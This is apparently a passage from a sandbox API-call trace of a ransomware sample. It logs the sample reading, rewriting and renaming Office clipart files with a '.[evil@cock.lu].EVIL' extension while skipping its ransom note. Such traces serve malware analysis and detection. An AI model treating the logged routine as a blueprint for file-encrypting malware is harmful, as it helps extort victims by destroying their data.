_File=0x7ffc020ee2a0) returned 0 [0166.657] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06049_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06049_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06049_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06049_.wmf.[evil@cock.lu].evil")) returned 1 [0166.658] ??_V@YAXPEAX@Z () returned 0x1 [0166.662] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06049_.WMF", dwFileAttributes=0x200) returned 0 [0166.662] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.662] wcsstr (_Str="PE06450_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.662] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06450_.WMF") returned 69 [0166.662] wcscmp (_String1="PE06450_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.662] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE06450_.WMF") returned 0x0 [0166.662] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06450_.WMF") returned 0x45 [0166.662] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06450_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06450_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.665] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4048, lpOverlapped=0x0) returned 1 [0166.667] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.668] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.668] _errno () returned 0x84b1160840 [0166.668] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.668] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x4060, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4060, lpOverlapped=0x0) returned 1 [0166.668] CloseHandle (hObject=0x1a8) returned 1 [0166.668] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06450_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.668] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.668] __uncaught_exception () returned 0x84b1160800 [0166.668] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.669] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06450_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06450_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06450_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06450_.wmf.[evil@cock.lu].evil")) returned 1 [0166.669] ??_V@YAXPEAX@Z () returned 0x1 [0166.673] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06450_.WMF", dwFileAttributes=0x200) returned 0 [0166.673] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.673] wcsstr (_Str="PH00601G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.673] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00601G.GIF") returned 69 [0166.673] wcscmp (_String1="PH00601G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.673] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH00601G.GIF") returned 0x0 [0166.673] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00601G.GIF") returned 0x45 [0166.673] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00601G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00601g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.676] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x629, lpOverlapped=0x0) returned 1 [0166.679] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.679] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.679] _errno () returned 0x84b1160840 [0166.679] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.680] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x640, lpOverlapped=0x0) returned 1 [0166.680] CloseHandle (hObject=0x1a8) returned 1 [0166.680] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00601G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.680] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.680] __uncaught_exception () returned 0x84b1160800 [0166.680] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.680] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00601G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00601g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00601G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00601g.gif.[evil@cock.lu].evil")) returned 1 [0166.682] ??_V@YAXPEAX@Z () returned 0x1 [0166.685] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00601G.GIF", dwFileAttributes=0x200) returned 0 [0166.685] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.685] wcsstr (_Str="PH00780U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.685] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00780U.BMP") returned 69 [0166.685] wcscmp (_String1="PH00780U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.685] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH00780U.BMP") returned 0x0 [0166.685] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00780U.BMP") returned 0x45 [0166.685] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00780U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00780u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.688] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8628, lpOverlapped=0x0) returned 1 [0166.702] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.702] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.702] _errno () returned 0x84b1160840 [0166.702] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.702] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x8640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8640, lpOverlapped=0x0) returned 1 [0166.702] CloseHandle (hObject=0x1a8) returned 1 [0166.702] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00780U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.703] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.703] __uncaught_exception () returned 0x84b1160800 [0166.703] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.703] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00780U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00780u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00780U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph00780u.bmp.[evil@cock.lu].evil")) returned 1 [0166.704] ??_V@YAXPEAX@Z () returned 0x1 [0166.707] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH00780U.BMP", dwFileAttributes=0x200) returned 0 [0166.708] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.708] wcsstr (_Str="PH01035U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.708] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01035U.BMP") returned 69 [0166.708] wcscmp (_String1="PH01035U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.708] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01035U.BMP") returned 0x0 [0166.708] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01035U.BMP") returned 0x45 [0166.708] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01035U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01035u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.711] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7e90, lpOverlapped=0x0) returned 1 [0166.716] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.716] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.716] _errno () returned 0x84b1160840 [0166.716] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.716] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x7ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7ea0, lpOverlapped=0x0) returned 1 [0166.716] CloseHandle (hObject=0x1a8) returned 1 [0166.716] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01035U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.717] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.717] __uncaught_exception () returned 0x84b1160800 [0166.717] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.717] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01035U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01035u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01035U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01035u.bmp.[evil@cock.lu].evil")) returned 1 [0166.718] ??_V@YAXPEAX@Z () returned 0x1 [0166.721] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01035U.BMP", dwFileAttributes=0x200) returned 0 [0166.722] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.722] wcsstr (_Str="PH01046J.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.722] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01046J.JPG") returned 69 [0166.722] wcscmp (_String1="PH01046J.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.722] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01046J.JPG") returned 0x0 [0166.722] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01046J.JPG") returned 0x45 [0166.722] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01046J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01046j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.724] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x211bb, lpOverlapped=0x0) returned 1 [0166.729] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.729] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.730] _errno () returned 0x84b1160840 [0166.730] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.730] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x211c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x211c0, lpOverlapped=0x0) returned 1 [0166.730] CloseHandle (hObject=0x1a8) returned 1 [0166.730] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01046J.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.731] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.731] __uncaught_exception () returned 0x84b1160800 [0166.731] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.731] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01046J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01046j.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01046J.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01046j.jpg.[evil@cock.lu].evil")) returned 1 [0166.732] ??_V@YAXPEAX@Z () returned 0x1 [0166.736] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01046J.JPG", dwFileAttributes=0x200) returned 0 [0166.736] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.736] wcsstr (_Str="PH01179J.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.736] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01179J.JPG") returned 69 [0166.736] wcscmp (_String1="PH01179J.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.736] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01179J.JPG") returned 0x0 [0166.736] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01179J.JPG") returned 0x45 [0166.736] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01179J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01179j.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.738] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa202, lpOverlapped=0x0) returned 1 [0166.742] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.742] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.742] _errno () returned 0x84b1160840 [0166.742] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.742] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0xa220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa220, lpOverlapped=0x0) returned 1 [0166.742] CloseHandle (hObject=0x1a8) returned 1 [0166.742] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01179J.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.743] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.743] __uncaught_exception () returned 0x84b1160800 [0166.743] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.743] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01179J.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01179j.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01179J.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01179j.jpg.[evil@cock.lu].evil")) returned 1 [0166.744] ??_V@YAXPEAX@Z () returned 0x1 [0166.747] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01179J.JPG", dwFileAttributes=0x200) returned 0 [0166.748] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.748] wcsstr (_Str="PH01213K.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.748] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01213K.JPG") returned 69 [0166.748] wcscmp (_String1="PH01213K.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.748] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01213K.JPG") returned 0x0 [0166.748] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01213K.JPG") returned 0x45 [0166.748] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01213K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01213k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.751] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x18be, lpOverlapped=0x0) returned 1 [0166.753] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.754] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.754] _errno () returned 0x84b1160840 [0166.754] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.754] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x18c0, lpOverlapped=0x0) returned 1 [0166.754] CloseHandle (hObject=0x1a8) returned 1 [0166.754] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01213K.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.754] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.754] __uncaught_exception () returned 0x84b1160800 [0166.754] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.755] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01213K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01213k.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01213K.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01213k.jpg.[evil@cock.lu].evil")) returned 1 [0166.756] ??_V@YAXPEAX@Z () returned 0x1 [0166.759] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01213K.JPG", dwFileAttributes=0x200) returned 0 [0166.759] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.759] wcsstr (_Str="PH01221K.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.759] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01221K.JPG") returned 69 [0166.759] wcscmp (_String1="PH01221K.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.759] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01221K.JPG") returned 0x0 [0166.759] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01221K.JPG") returned 0x45 [0166.759] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01221K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01221k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.762] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1c94, lpOverlapped=0x0) returned 1 [0166.765] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.765] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.765] _errno () returned 0x84b1160840 [0166.765] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.765] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1ca0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1ca0, lpOverlapped=0x0) returned 1 [0166.765] CloseHandle (hObject=0x1a8) returned 1 [0166.765] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01221K.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.765] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.766] __uncaught_exception () returned 0x84b1160800 [0166.766] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.766] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01221K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01221k.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01221K.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft 